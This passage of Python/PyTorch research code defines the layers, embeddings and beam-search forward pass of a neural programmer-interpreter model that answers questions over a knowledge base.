hidden_size=self.cell_dim, batch_first=True)
self.reset_scope = 'reset_scope'
self.reset_layer = nn.Linear(self.npi_core_dim, self.npi_core_dim)
self.state_encoding_scope_1 = 'state_encoding_scope_layer1'
self.state_encoding_layer1 = nn.Linear(self.npi_core_dim+self.var_embed_dim, self.hidden_dim)
self.state_encoding_scope_2 = 'state_encoding_scope_layer2'
self.state_encoding_layer2 = nn.Linear(self.hidden_dim, self.hidden_dim)
self.state_encoding_scope_3 = 'state_encoding_scope_layer3'
self.state_encoding_layer3 = nn.Linear(self.hidden_dim, self.state_dim)
self.phase_change_scope = 'phase_change_scope'
self.phase_change_layer = nn.Linear(self.npi_core_dim, 1)
self.prog_key_scope1 = 'prog_net_fcc1'
if self.concat_query_npistate:
self.prog_key_layer1 = nn.Linear(self.npi_core_dim+self.var_embed_dim+self.cell_dim, self.prog_key_dim)
else:
self.prog_key_layer1 = nn.Linear(self.npi_core_dim+self.var_embed_dim, self.prog_key_dim)
self.prog_key_scope2 = 'prog_net_fcc2'
self.prog_key_layer2 = nn.Linear(self.prog_key_dim, self.prog_key_dim)
self.inp_var_key_scope = 'inp_var_key_scope'
self.inp_var_key_layer = nn.Linear(self.max_num_var, self.var_key_dim)
self.get_target_var_key_and_embedding_arg_scope = 'get_target_var_key_and_embedding_arg_scope'
self.target_var_key_and_embedding_arg_layer = nn.ModuleList([nn.Linear(2*self.argtype_embed_dim, self.argtype_embed_dim) \
for i in xrange(self.max_arguments)])
self.get_target_var_key_and_embedding_var_scope = 'get_target_var_key_and_embedding_var_scope'
self.target_var_key_and_embedding_var_layer = nn.ModuleList([nn.Linear(2*self.var_embed_dim, self.var_embed_dim) \
for i in xrange(self.max_arguments)])
self.get_target_var_key_and_embedding_targetembed_scope = 'get_target_var_key_and_embedding_targetembed_scope'
self.target_var_key_and_embedding_targetembed_layer = nn.Linear(self.var_embed_dim+self.argtype_embed_dim+\
self.prog_embed_dim, self.var_embed_dim)
self.get_target_var_key_and_embedding_targetkey_scope = 'get_target_var_key_and_embedding_targetkey_scope'
self.target_var_key_and_embedding_targetkey_layer = nn.Linear(self.var_embed_dim+self.argtype_embed_dim+\
self.prog_embed_dim, self.var_key_dim)
self.update_attention_scope = 'update_attention_scope'
self.update_attention_layer = nn.ModuleList([nn.Linear(self.max_num_var+self.npi_core_dim,self.max_num_var) \
for i in xrange(self.num_argtypes)])
self.batch_ids = torch.arange(0,self.batch_size,dtype = self.dtype_int64, device=self.device)
# tensor is of dimension batch_size x 1 i.e. [0, 1, 2, ... batch_size]
rel_embedding_mat = torch.tensor(rel_embedding, device=self.device, dtype=self.dtype_float)
self.rel_embedding = nn.Embedding(rel_embedding.shape[0], rel_embedding.shape[1], _weight=rel_embedding_mat)
type_embedding_mat = torch.tensor(type_embedding, device=self.device)
self.type_embedding = nn.Embedding(type_embedding.shape[0], type_embedding.shape[1], _weight=type_embedding_mat)
max_val = 6. / np.sqrt(self.cell_dim + self.wikidata_embed_dim)
self.query_rel_atten = nn.Parameter(torch.tensor(np.random.normal(-max_val, max_val, [self.cell_dim, self.wikidata_embed_dim]), \
requires_grad=True, device=self.device))
word_embeddings_mat = torch.tensor(vocab_embed, device=self.device, dtype=self.dtype_float)
self.word_embeddings = nn.Embedding(vocab_embed.shape[0], vocab_embed.shape[1], _weight=word_embeddings_mat)
self.enc_scope_text = "encoder_text"
max_val = 6. / np.sqrt(self.num_progs + self.prog_embed_dim)
program_embedding_mat = torch.tensor(np.random.normal(-max_val, max_val, [self.num_progs, self.prog_embed_dim]), \
device=self.device, dtype=self.dtype_float)
self.program_embedding = nn.Embedding(self.num_progs, self.prog_embed_dim, _weight=program_embedding_mat)
max_val = 6. / np.sqrt(1 + self.hidden_dim)
self.query_attention_h_mat = nn.Parameter(torch.tensor(np.random.normal(-max_val, max_val, [1, self.hidden_dim]), \
requires_grad=True, device=self.device, dtype=self.dtype_float))
max_val = 6. / np.sqrt(self.wikidata_embed_dim + self.var_embed_dim)
self.preprocessed_var_emb_mat = nn.Parameter(torch.tensor(np.random.normal(-max_val, max_val, \
[self.wikidata_embed_dim, self.var_embed_dim]), \
requires_grad=True, device=self.device, \
dtype=self.dtype_float))
max_val = 6. / np.sqrt(self.num_progs + self.prog_key_dim)
self.init_state = nn.Parameter(torch.zeros([1, self.cell_dim],requires_grad=True,device=self.device, dtype=self.dtype_float))
self.program_keys = nn.Parameter(torch.tensor(np.random.normal(-max_val, max_val, [self.num_progs, self.prog_key_dim]), \
requires_grad=True, device=self.device, dtype=self.dtype_float))
self.program_to_argtype_table = torch.tensor(program_to_argtype_table, device=self.device, \
dtype=self.dtype_int64)
self.program_to_targettype_table = torch.tensor(program_to_targettype_table,
device=self.device, dtype=self.dtype_int64)
max_val = 6. /np.sqrt(self.num_argtypes + self.argtype_embed_dim)
argtype_embedding_mat = torch.tensor(np.random.normal(-max_val, max_val, \
[self.num_argtypes, self.argtype_embed_dim]), \
device=self.device, dtype=self.dtype_float)
self.argtype_embedding = nn.Embedding(self.num_argtypes, self.argtype_embed_dim, _weight=argtype_embedding_mat)
self.program_to_num_arguments = torch.max(input=self.one_hot(self.program_to_argtype_table,depth=self.num_argtypes),dim=1)[0]
#program_to_num_arguments is of dimension num_progs x num_argtypes
# accomodating for the beam_size
create_cell_scopes()
def get_parameters(self):
return (self.program_keys, self.program_embedding, self.word_embeddings, \
self.argtype_embedding, self.query_attention_h_mat)
def create_placeholder(self):
self.encoder_text_inputs_w2v = None
self.encoder_text_inputs_kb_emb = None
self.preprocessed_var_mask_table = [[None]*self.max_num_var]*self.num_argtypes
self.preprocessed_var_emb_table = [[None]*self.max_num_var]*self.num_argtypes
self.kb_attention = None
self.progs_phase_1 = None
self.progs_phase_2 = None
self.gold_target_type = None
self.randomness_threshold_beam_search = None
self.DoPruning = None
self.last_step_feasible_program = None
self.bias_prog_sampling_with_target = None
self.bias_prog_sampling_with_last_variable = None
self.required_argtypes = None
self.relaxed_reward_multipler = None
self.IfPosIntermediateReward = None
self.mask_IntermediateReward = None
self.IntermediateReward = None
def manual_gather_nd(self, params,indices):
param_shape = list(params.shape)
#print param_shape
number_of_axes = indices.shape[-1]
f_indices = self.map_index_to_flattened(indices,param_shape[0:number_of_axes])
f_params = params.contiguous().view([-1]+param_shape[number_of_axes:]) #this reshaping cannot be avoided
return torch.index_select(f_params,0,f_indices)
def get_final_feasible_progs_for_last_timestep(self, feasible_progs, beam_properties, beam_id, feasible_progs_for_last_timestep, t):
if t == self.num_timesteps-1:
feasible_progs_for_last_timestep = feasible_progs_for_last_timestep.type(feasible_progs[beam_id].dtype)
#feasible_progs[beam_id] = tf.add(feasible_progs[beam_id], tf.zeros_like(feasible_progs[beam_id]))
temp = torch.where((self.gold_target_type==beam_properties['target_type'][beam_id]), \
torch.ones_like(self.gold_target_type, device=self.device), \
torch.zeros_like(self.gold_target_type, device=self.device))
current_equal_to_gold_target_type = torch.unsqueeze(temp, dim=1).repeat([1, self.num_progs]).type(feasible_progs[beam_id].dtype)
#current_equal_to_gold_target_type is of size batch_size x num_progs
t1 = self.one_hot(torch.zeros([self.batch_size], device=self.device), depth=self.num_progs)
t2 = self.one_hot((self.num_progs-1)*torch.ones([self.batch_size], device=self.device), depth=self.num_progs)
temp = (t1 + t2).type(feasible_progs[beam_id].dtype)
#temp is of size batch_size x num_progs
feasible_progs_for_last_timestep = current_equal_to_gold_target_type*temp + (1-temp)*feasible_progs_for_last_timestep
temp2 = (1-self.last_step_feasible_program)*feasible_progs[beam_id] + \
self.last_step_feasible_program*torch.mul(feasible_progs[beam_id], feasible_progs_for_last_timestep)
temp3 = torch.unsqueeze(torch.sum((1-temp)*temp2, dim=1),dim=1).repeat([1,self.num_progs])
#temp3 is of dimension batch_size x num_progs
feasible_progs[beam_id] = torch.where((temp3==0), feasible_progs[beam_id], temp2)
return feasible_progs[beam_id]
def forward(self, feed_dict):
#with tf.device(tf.test.gpu_device_name()):
with torch.no_grad():
self.variable_embedding = []
self.variable_keys = []
self.variable_atten_table = []
self.variable_mask = []
max_val = 6. / np.sqrt(self.max_num_var)
for beam_id in xrange(self.beam_size):
self.variable_embedding.append(torch.zeros([self.num_argtypes, self.batch_size, \
self.max_num_var, self.var_embed_dim], \
device=self.device))
self.variable_keys.append(torch.zeros([self.num_argtypes, self.batch_size, \
self.max_num_var, self.var_key_dim], \
device=self.device))
temp = torch.zeros([self.num_argtypes, self.batch_size, self.max_num_var], device=self.device)
self.variable_atten_table.append(list(torch.unbind(temp, dim=0)))
self.variable_mask.append(torch.zeros([self.num_argtypes, self.batch_size, self.max_num_var], \
device=self.device))
self.encoder_text_inputs_w2v = torch.tensor(feed_dict['encoder_text_inputs_w2v'], \
device=self.device, dtype=self.dtype_int64)
self.preprocessed_var_mask_table = [[torch.tensor(feed_dict['preprocessed_var_mask_table'][i][j], \
device=self.device, dtype=self.dtype_float) \
for j in range(self.max_num_var)] for i in range(self.num_argtypes)]
self.preprocessed_var_emb_table = [[torch.tensor(feed_dict['preprocessed_var_emb_table'][i][j], \
device=self.device, dtype=self.dtype_float) \
for j in range(self.max_num_var)] for i in range(self.num_argtypes)]
self.encoder_text_inputs_kb_emb = torch.tensor(feed_dict['encoder_text_inputs_kb_emb'], \
device=self.device, dtype=self.dtype_float)
self.kb_attention = torch.tensor(feed_dict['kb_attention'], device=self.device, dtype=self.dtype_float)
self.progs_phase_1 = torch.tensor(feed_dict['progs_phase_1'], device=self.device, dtype=self.dtype_int64)
self.progs_phase_2 = torch.tensor(feed_dict['progs_phase_2'], device=self.device, dtype=self.dtype_int64)
self.gold_target_type = torch.tensor(feed_dict['gold_target_type'], device=self.device, dtype=self.dtype_int64)
self.randomness_threshold_beam_search = torch.tensor(feed_dict['randomness_threshold_beam_search'], \
device=self.device, dtype=self.dtype_float)
self.DoPruning = torch.tensor(feed_dict['DoPruning'], device=self.device, dtype=self.dtype_float)
self.last_step_feasible_program = torch.tensor(feed_dict['last_step_feasible_program'], \
device=self.device, dtype=self.dtype_float)
self.bias_prog_sampling_with_last_variable = torch.tensor(feed_dict['bias_prog_sampling_with_last_variable'], \
device=self.device, dtype=self.dtype_float)
self.bias_prog_sampling_with_target = torch.tensor(feed_dict['bias_prog_sampling_with_target'], \
device=self.device, dtype=self.dtype_float)
self.required_argtypes = torch.tensor(feed_dict['required_argtypes'], device=self.device, dtype=self.dtype_int64)
self.relaxed_reward_multipler = torch.tensor(feed_dict['relaxed_reward_multipler'], device=self.device, \
dtype=self.dtype_float)
sentence_state, attention_states = self.sentence_encoder()
beam_properties = defaultdict(list)
beam_properties['Model_Reward_Flag'] = [torch.zeros([self.batch_size], device=self.device) \
for beam_id in xrange(self.beam_size)]
for beam_id in xrange(self.beam_size):
beam_properties['Model_Reward_Flag'][beam_id] = self.add_preprocessed_output_to_variable_table(beam_id)
init_h_states, init_e_state, init_target_var_embedding = self.reset_state(sentence_state)
unswitched_beam_properties = defaultdict(list)
beam_properties['h_states'] = [init_h_states for beam_id in xrange(self.beam_size)]
beam_properties['h'] = [None for beam_id in xrange(self.beam_size)]
beam_properties['e_state'] = [init_e_state for beam_id in xrange(self.beam_size)]
beam_properties['target_var_embedding'] = [init_target_var_embedding for beam_id in xrange(self.beam_size)]
beam_properties['prog_sampled_indices'] = [None for beam_id in xrange(self.beam_size)]
beam_properties['input_var_sampled_indices'] = [None for beam_id in xrange(self.beam_size)]
unswitched_beam_properties['total_beam_score'] = [torch.zeros([self.batch_size], device=self.device)] + \
[-30*torch.ones([self.batch_size], device=self.device) \
for beam_id in xrange(self.beam_size-1)]
#beam_properties['total_beam_score'] = [tf.zeros([self.batch_size]) for beam_id in xrange(self.beam_size)]
beam_properties['terminate'] = [torch.zeros([self.batch_size,1], device=self.device) \
for beam_id in xrange(self.beam_size)]
beam_properties['length'] = [torch.zeros([self.batch_size,1], device=self.device) \
for beam_id in xrange(self.beam_size)]
beam_properties['target_type'] = [torch.zeros([self.batch_size], device=self.device, dtype=self.dtype_int64) \
for beam_id in xrange(self.beam_size)]
beam_properties['phase_elasticity'] = [torch.ones([self.batch_size,1], device=self.device) for beam_id in xrange(self.beam_size)]
beam_properties['program_argument_table_index'] = [torch.ones([self.batch_size, self.num_progs,
int(math.pow(self.max_num_var,self.max_arguments))], device=self.device) for beam_id in xrange(self.beam_size)]
beam_properties['query_attentions_till_now'] = [torch.zeros([self.batch_size,self.max_len], device=self.device) for beam_id in xrange(self.beam_size)]
self.debug_beam_terminate = defaultdict(list)
beam_properties['none_count'] = [torch.zeros([self.batch_size,1], device=self.device) for beam_id in xrange(self.beam_size)]
# beam_properties['check_penalization'] = [torch.zeros([self.batch_size,1], device=self.device) for beam_id in xrange(self.beam_size)]
to_return_per_step_prob = -1*torch.ones([self.batch_size,self.beam_size,self.num_timesteps], device=self.device)
#[-1*tf.ones([self.batch_size, self.beam_size]) for time_step in xrange(self.num_timesteps)]
to_return_sequence_logprob = torch.zeros([self.batch_size, self.beam_size], device=self.device)
# this should finally contain a tensor of batch_size x beam_size
to_return_action_sequence = dict.fromkeys(['program_type','argument_type','target_type',\
'target_table_index','argument_table_index'])
for key in ['program_type','argument_type','target_type','target_table_index','argument_table_index']:
to_return_action_sequence[key] = [[] for beam_id in xrange(self.beam_size)]
self.entropy = torch.tensor(0, device=self.device, dtype=self.dtype_float)
feasible_progs_for_last_timestep = self.get_feasible_progs_for_last_timestep()
for t in xrange(self.num_timesteps):
entropy = torch.tensor(0, device=self.device, dtype=self.dtype_float)
# =============================================================================
current_beam_score = [score+0 for score in unswitched_beam_properties['total_beam_score']]
if t > 0:
beam_properties['phase_elasticity'] = [self.phase_change_net(h.view([self.batch_size, -1]),t, old_p_el) \
for h,old_p_el in zip(beam_properties['h'], beam_properties['phase_elasticity'])]
feasible_progs = self.get_feasible_progs(t, beam_properties['phase_elasticity'])
to_penalize_beams = [torch.zeros([self.batch_size,self.num_actions], device=self.device) for beam_id in xrange(self.beam_size)]
for beam_id in xrange(self.beam_size):
beam_properties['e_state'][beam_id] = self.env_encoding(beam_properties['e_state'][beam_id], \
beam_properties['target_var_embedding'][beam_id])[1]
[beam_properties['h'][beam_id],
beam_properties['h_states'][beam_id]] = self.npi_core(beam_properties['h_states'][beam_id], \
beam_properties['e_state'][beam_id], \
beam_properties['target_var_embedding'][beam_id])
feasible_progs[beam_id] = self.get_final_feasible_progs_for_last_timestep(feasible_progs, \
beam_properties, beam_id, feasible_progs_for_last_timestep, t)
[prog_sampled_probs, prog_sampled_indices, \
prog_sampled_embeddings, kb_attention_for_sampled_progs, \
beam_properties['query_attentions_till_now'][beam_id]] = self.prog_net(beam_properties['h'][beam_id],
sentence_state, attention_states,
beam_properties['query_attentions_till_now'][beam_id], \
feasible_progs[beam_id], \
self.num_programs_to_sample, \
beam_properties['terminate'][beam_id], \
beam_properties['target_type'][beam_id])
# prog_sampled_probs batch_size x num_programs_to_sample
# prog_sampled_indices batch_size x num_programs_to_sample
# prog_sampled_embeddings is a tensor of shape batch_size x num_programs_to_sample x prog_embedding_dim
# kb_attention_for_sampled_progs is a num_programs_to_sample length list a flat tensor of size max_var * max_var * max_var
beam_properties['prog_sampled_indices'][beam_id] = prog_sampled_indices
complete_action_probs = []
# for every sampled program will contain the probability of action obtained by sampling every possible var
per_program_input_var_sampled_indices = []
#for every sampled program will contain the possible variable samples
for _prog_sample_, _prog_embedding_, \
_kb_attention_for_sampled_progs_ , \
_program_prob_ in zip(list(torch.unbind(prog_sampled_indices, dim = 1)),\
list(torch.unbind(prog_sampled_embeddings, dim = 1)),\
list(torch.unbind(kb_attention_for_sampled_progs, dim = 0)),\
list(torch.unbind(prog_sampled_probs, dim = 1))):
arg_types = self.argument_type_net(_prog_sample_)[0]
past_program_variables = self.manual_gather_nd(beam_properties['program_argument_table_index'][beam_id], \
torch.cat([torch.unsqueeze(self.batch_ids, dim=1), torch.unsqueeze(_prog_sample_, dim=1)], dim=1))
#past_program_variables is of dimension batch_size x (max_arguments * max_num_var)
input_var_sampled_probs, input_var_sampled_indices = self.input_var_net(beam_properties['h'][beam_id],\
arg_types, _prog_sample_, _prog_embedding_,\
_kb_attention_for_sampled_progs_, \
beam_id, self.num_variables_to_sample, \
beam_properties['terminate'][beam_id], \
past_program_variables)[0:-1]
# input_var_sampled_indices has shape batch_size x num_variables_to_sample
# input_var_sampled_probs has shape batch_size x num_variables_to_sample
per_program_input_var_sampled_indices.append(input_var_sampled_indices)
complete_action_probs.append(torch.mul(input_var_sampled_probs, _program_prob_.view([-1,1])))
beam_properties['input_var_sampled_indices'][beam_id] = torch.stack(per_program_input_var_sampled_indices, dim=1)
# beam_properties['input_var_sampled_indices'] is beam_sized list containing tensors of
# shape batch_size x num_programs_to_sample x num_variables_to_sample
complete_action_probs = torch.stack(complete_action_probs, dim=1)
#complete_action_probs is a tensor of shape batch_size x num_progs_to_sample x num_vars_to_sample
complete_action_probs = complete_action_probs.view([self.batch_size,-1])
#complete_action_probs is a tensor of shape batch_size x num_actions.
# each program and joint_variables selectiont becomes an action
complete_action_probs = torch.clamp(complete_action_probs,self.eps,0.9)
log_complete_action_probs = torch.log(complete_action_probs)
entropy = entropy+ (-1*torch.sum(complete_action_probs*log_complete_action_probs))
if self.params['normalize_length'] is 1:
if t is 0:
current_beam_score[beam_id] = log_complete_action_probs + torch.unsqueeze(current_beam_score[beam_id],dim=1)
else:
score_if_terminated = log_complete_action_probs + torch.unsqueeze(current_beam_score[beam_id],dim=1)
power = 0.4
n1 = torch.pow(beam_properties['length'][beam_id], power)/torch.pow(beam_properties['length'][beam_id]+1.0, power)
n2 = 1.0/torch.pow(beam_properties['length'][beam_id]+1.0, power)
score_if_not_terminated = n2*log_complete_action_probs + n1*torch.unsqueeze(current_beam_score[beam_id],dim=1)
old_cbs = torch.unsqueeze(current_beam_score[beam_id],dim=1)*torch.ones_like(log_complete_action_probs, device=self.device)
current_beam_score[beam_id] = beam_properties['terminate'][beam_id]*score_if_terminated + \
(1-beam_properties['terminate'][beam_id])*score_if_not_terminated
current_beam_score[beam_id] = torch.where(current_beam_score[beam_id]>old_cbs, old_cbs,current_beam_score[beam_id])
else:
current_beam_score[beam_id] = log_complete_action_probs + torch.unsqueeze(current_beam_score[beam_id],dim=1)
if self.params['none_decay'] is 1:
power_decay = 0.2
penalize_factor = torch.mul(beam_properties['none_count'][beam_id].type(self.dtype_float),\
-1*torch.log(torch.tensor(math.pow(t+1,power_decay), device=self.device)*
torch.ones_like(beam_properties['none_count'][beam_id], device=self.device, dtype=self.dtype_float)))
current_beam_score[beam_id] = current_beam_score[beam_id]+penalize_factor
beam_target_type = beam_properties['target_type'][beam_id].view([self.batch_size, 1])
beam_gold_type = self.gold_target_type.view([self.batch_size, 1])
beam_if_terminated = beam_properties['terminate'][beam_id]
if self.params['prune_beam_type_mismatch'] is 1:
# print self.DoPruning, "$___DoPruning___$"
toadd = self.DoPruning*self.check_if_gold_target(beam_target_type, beam_gold_type, beam_if_terminated, t)
# toadd = self.check_if_gold_target(beam_target_type, beam_gold_type, beam_if_terminated, t)
to_penalize_beams[beam_id] = toadd+to_penalize_beams[beam_id]
# print 100*"#"
# print to_penalize_beams[0]
# print 100*"#"
# beam_properties['check_penalization'][beam_id] = to_penalize_beams[beam_id]
if t > 0:
penalize_none_start = torch.where(beam_target_type==0,\
torch.ones_like(beam_target_type, device=self.device),torch.zeros_like(beam_target_type, device=self.device)).type(self.dtype_float)
to_penalize_beams[beam_id] = penalize_none_start + to_penalize_beams[beam_id]
to_penalize_beams[beam_id] = torch.clamp(to_penalize_beams[beam_id],0,1)
current_beam_score[beam_id] = torch.clamp(current_beam_score[beam_id],2*math.log(self.eps),0)
self.entropy = self.entropy+entropy
current_score = torch.stack(current_beam_score,dim = 1)
#current_score is a tensor of shape batch_size x beam_size x num_actions
to_penalize_score = torch.stack(to_penalize_beams,dim = 1)
# flag_penalize = torch.min(to_penalize_score,dim=1,keepdim=True)[0]
flag_penalize = torch.prod(to_penalize_score,dim=1,keepdim=True)
to_penalize_score = to_penalize_score * (1-flag_penalize)
to_penalize_score = math.log(self.eps)*to_penalize_score
current_score = current_score+to_penalize_score
current_score = torch.clamp(current_score,2*math.log(self.eps),0)
self.debug_beam_terminate['current_score'].append(current_score)
current_score = current_score.view([self.batch_size,-1])
top_scores, indices_top_scores = torch.topk(current_score, k = self.beam_size)
# top_scores has shape batch_size x beam_size
# indices_top_scores has shape batch_size x beam_size
to_return_sequence_logprob = top_scores+0
#to_return_sequence_logprob has shape batch_size x beam_size
old_score = torch.stack(unswitched_beam_properties['total_beam_score'])
#need to transform this old_score w.r.t changes in beam_id
#old_score has shape beam_size x batch_size
#updating the score list
unswitched_beam_properties['total_beam_score'] = list(torch.unbind(top_scores,dim = 1))
new_beam_ids, action_ids = self.map_index_to_unflattened(indices_top_scores, [self.beam_size, self.num_actions])
#new_beam_ids has shape batch_size x beam_size
# action_ids has shape batch_size x beam_size
action_ids = torch.transpose(action_ids, 1,0)
# action_ids has shape beam_size x batch_size
# updating the memory w.r.t beams
new_beam_ids = torch.transpose(new_beam_ids,1,0)
#new_beam_ids has shape beam_size x batch_size
self.debug_beam_terminate['new_beam_ids'].append(new_beam_ids)
#updating old_score w.r.t change in beam_ids
old_score = self.beam_switch(old_score, new_beam_ids)
# =============================================================================
# updating the to_return_per_step_prob w.r.t beam_id changes
if t > 0:
old_prop_val = to_return_per_step_prob+0
old_prop_val = torch.transpose(old_prop_val, 1,0)
to_return_per_step_prob = self.beam_switch(old_prop_val, new_beam_ids)
to_return_per_step_prob = torch.transpose(to_return_per_step_prob, 1,0)
# ______________________________________________________________________________
################################################################################
# =============================================================================
# For Printing Per Step Prob
delta_score = to_return_sequence_logprob-torch.transpose(old_score, 1,0)
current_probs = torch.exp(delta_score)
multiplier = self.one_hot(t*torch.ones([self.batch_size, self.beam_size], device=self.device), depth = self.num_timesteps, dtype=self.dtype_float)
additand = torch.mul(multiplier, current_probs.view([self.batch_size, self.beam_size,1]).repeat(1,1,self.num_timesteps))
additand2 = torch.mul(to_return_per_step_prob,1-multiplier)
to_return_per_step_prob = additand2+additand
# ______________________________________________________________________________
################################################################################
self.debug_beam_terminate['to_return_per_step_prob'].append(to_return_per_step_prob)
self.debug_beam_terminate['to_return_sequence_logprob'].append(torch.exp(to_return_sequence_logprob))
# =============================================================================
# updating the beam_properties w.r.t beam_id changes
for prop in beam_properties.keys():
old_prop_val = torch.stack(beam_properties[prop],dim=0)
# each beam_prop will be of shape beam_size x batch_size x Tensor_shape
new_prop_val = self.beam_switch(old_prop_val, new_beam_ids)
beam_properties[prop] = list(torch.unbind(new_prop_val, dim = 0))
# ______________________________________________________________________________
###############################################################################
# =============================================================================
# updating the variable properties corresponding to beams w.r.t beam_id changes
# variable_properties are :-
#variable_embedding - beam_size x [num_argtypes, batch_size, max_num_var, var_embed_dim]
#variable_keys - beam_size x [num_argtypes, batch_size, max_num_var, var_key_dim]
#variable_mask - beam_size x [num_argtypes, batch_size, max_num_var]
#variable_atten_table - beam_size x num_argtypes x [batch_size, max_num_var]
# keeping in mind beam_size
#1)variable_embedding
old_prop_val = torch.stack(self.variable_embedding, dim=0)
old_prop_val = old_prop_val.permute([0,2,1,3,4])
# now old_prop_val has shape beam_size x batch_size x (tensor_shape = num_argtypes x max_num_var x var_embed_dim)
new_prop_val = self.beam_switch(old_prop_val, new_beam_ids)
self.variable_embedding = list(torch.unbind(new_prop_val.permute([0,2,1,3,4]), dim = 0))
# variable_embedding beam_size x [num_argtypes, batch_size, max_num_var, var_embed_dim]
#2)variable_keys
old_prop_val = torch.stack(self.variable_keys, dim=0)
# old_prop_val [beam_size, num_argtypes, batch_size, max_num_var, var_key_dim]
old_prop_val = old_prop_val.permute([0,2,1,3,4])
new_prop_val = self.beam_switch(old_prop_val, new_beam_ids)
self.variable_keys = list(torch.unbind(new_prop_val.permute([0,2,1,3,4]), dim = 0))
# variable_keys beam_size x [num_argtypes, batch_size, max_num_var, var_key_dim]
#3)variable_mask
old_prop_val = torch.stack(self.variable_mask, dim=0)
# old_prop_val [beam_size, num_argtypes, batch_size, max_num_var]
old_prop_val = old_prop_val.permute([0,2,1,3])
new_prop_val = self.beam_switch(old_prop_val, new_beam_ids)
self.variable_mask = list(torch.unbind(new_prop_val.permute([0,2,1,3]), dim = 0))
# variable_mask beam_size x [num_argtypes, batch_size, max_num_var]
#4)variable attention table
#variable_atten_table - beam_size x num_argtypes x [batch_size, max_num_var]
old_prop_val = []
for beam_id in xrange(self.beam_size):
old_prop_val.append(torch.stack(self.variable_atten_table[beam_id], dim=1))
old_prop_val = torch.stack(old_prop_val, dim = 0)
# old_prop_val [beam_size, batch_size, num_argtypes, max_num_var]
new_prop_val = self.beam_switch(old_prop_val, new_beam_ids)
temp = list(torch.unbind(new_prop_val.permute([0,2,1,3]), dim = 0))
self.variable_atten_table = [list(torch.unbind(_temp_, dim = 0)) for (beam_id, _temp_) in \
zip(xrange(self.beam_size), temp)]
# variable_atten_table beam_size x num_argtypes x [batch_size, max_num_var]
# done updating beam_memory
# done updating variable_memeory
# ______________________________________________________________________________
###############################################################################
# =============================================================================
# have to update to_return_action_* w.r.t to change in beam_id
if t > 0:
for key in ['program_type','argument_type','target_type','target_table_index','argument_table_index']:
# to_return_action_sequence beam_size x seq_length x [tensor_shape]
old_prop_val = []
for beam_id in xrange(self.beam_size):
temp = torch.stack(to_return_action_sequence[key][beam_id], dim=1)
# temp [seq_length x tensor_shape]
old_prop_val.append(temp)
old_prop_val = torch.stack(old_prop_val, dim = 0)
# beam_size x batch_size x seq_length x tensor_shape
new_prop_val = self.beam_switch(old_prop_val, new_beam_ids)
temp = torch.unbind(new_prop_val, dim = 0)
to_return_action_sequence[key] = [list(torch.unbind(_temp_, dim = 1)) for (beam_id, _temp_) in \
zip(xrange(self.beam_size), temp)]
#print key, ':: to_return_action_sequence[',key,']', to_return_action_sequence[key]
# done updating to_return_action_* w.r.t to change in beam_id
# _____________________________________________________________________________
###############################################################################
# =============================================================================
#getting the pointer to program sample and pointer to variable sample from action_id
[pointer_to_prog_sample, \
pointer_to_variable_sample] = self.map_index_to_unflattened(action_ids,[self.num_programs_to_sample,\
self.num_variables_to_sample])
# pointer_to_prog_sample has shape beam_size x batch_size
# pointer_to_variable_sample has shape beam_size x batch_size
# getting the actual program samples
# pointer_to_prog_sample beam_size x batch_size
multiplicand_2 = torch.stack(beam_properties['prog_sampled_indices'], dim = 0)
#multiplicand_2 beam_size x batch_size x num_programs_to_sample
multiplicand_1 = self.one_hot(pointer_to_prog_sample, depth=self.num_programs_to_sample, dtype=multiplicand_2.dtype)
#multiplicand_1 beam_size x batch_size x num_programs_to_sample
true_program_sample = torch.sum(torch.mul(multiplicand_1, multiplicand_2), dim = 2)
#true_program_sample is a tensor of shape beam_size x batch_size
# _____________________________________________________________________________
###############################################################################
# =============================================================================
# checking if any beam has terminated
for prog_samples, beam_id in zip(list(torch.unbind(true_program_sample, dim = 0)), xrange(self.beam_size)):
beam_properties['terminate'][beam_id] = self.terminate_net(prog_samples, beam_properties['terminate'][beam_id])
#update the length
beam_properties['length'][beam_id] = beam_properties['length'][beam_id] + (1.0-beam_properties['terminate'][beam_id])
beam_properties['none_count'][beam_id] = self.none_finder_net(prog_samples)
# _____________________________________________________________________________
###############################################################################
# =============================================================================
# getting the actual variable samples
# beam_properties['input_var_sampled_indices'] is a list of length beam_size with
# tensor of shape [batch_size x num_programs_to_sample x num_variables_to_sample]
multiplicand_1 = torch.stack(beam_properties['input_var_sampled_indices'], dim = 0)
multiplicand_2 = torch.unsqueeze(self.one_hot(pointer_to_prog_sample, depth = self.num_programs_to_sample, dtype=multiplicand_1.dtype), dim = 3)
flattened_input_var_sample = torch.sum(torch.mul(multiplicand_1, multiplicand_2),dim = 2)
# flattened_input_var_sample has shape [beam_size x batch_size x num_variables_to_sample]
multiplicand_1 = flattened_input_var_sample
multiplicand_2 = self.one_hot(pointer_to_variable_sample, depth = self.num_variables_to_sample, dtype=multiplicand_1.dtype)
flattened_input_var_sample = torch.sum(torch.mul(multiplicand_1, multiplicand_2), dim = 2)
# flattened_input_var_sample has shape [beam_size x batch_size]
actual_var_samples_list = self.map_index_to_unflattened(flattened_input_var_sample, \
[self.max_num_var for _ in xrange(self.max_arguments)])
# is a max_arguments sized list containing tensors of shape [beam_size x batch_size]
# this contains the actual variable samples
#print 'actual_var_samples_list ', actual_var_samples_list
actual_var_samples_list = list(torch.unbind(torch.stack(actual_var_samples_list,dim = 2).type(self.dtype_int64), dim = 0))
# actual_var_samples_list is a list of beam_size length containing tensors of shape [batch_size x max_arguments]
# _____________________________________________________________________________
###############################################################################
# =============================================================================
# Code For Preventing step repitition in generated trajectories
# need to do a scatter update on 'program_argument_table_index' and set used steps to 0
index_0 = torch.range(0,self.beam_size*self.batch_size-1,device = self.device, dtype=self.dtype_int64)
# index_0 has shape [(beam_size*batch_size)]
index_1 = true_program_sample.view([-1])
# index_1 has shape [(beam_size*batch_size)]
index_2 = flattened_input_var_sample.view([-1])
# index_2 has shape [(beam_size*batch_size)]
new_value = torch.ones_like(index_1, device=self.device)
b1 = (index_1==torch.zeros_like(index_1, device=self.device)).type(self.dtype_float)
b2 = (index_1==self.num_progs-1*torch.ones_like(index_1,device=self.device)).type(self.dtype_float)
new_value = torch.where(torch.max(b1,b2)>0, new_value, 0*new_value)
old_property_value = torch.stack(beam_properties['program_argument_table_index'], dim = 0)
# old_property_value has shape beam_size x batch_size x num_progs x (max_arguments*max_num_var)
old_property_value = old_property_value.view([-1, self.num_progs, int(math.pow(self.max_num_var,self.max_arguments))])
index_for_scatter = torch.stack([index_0, index_1, index_2], dim = 1)
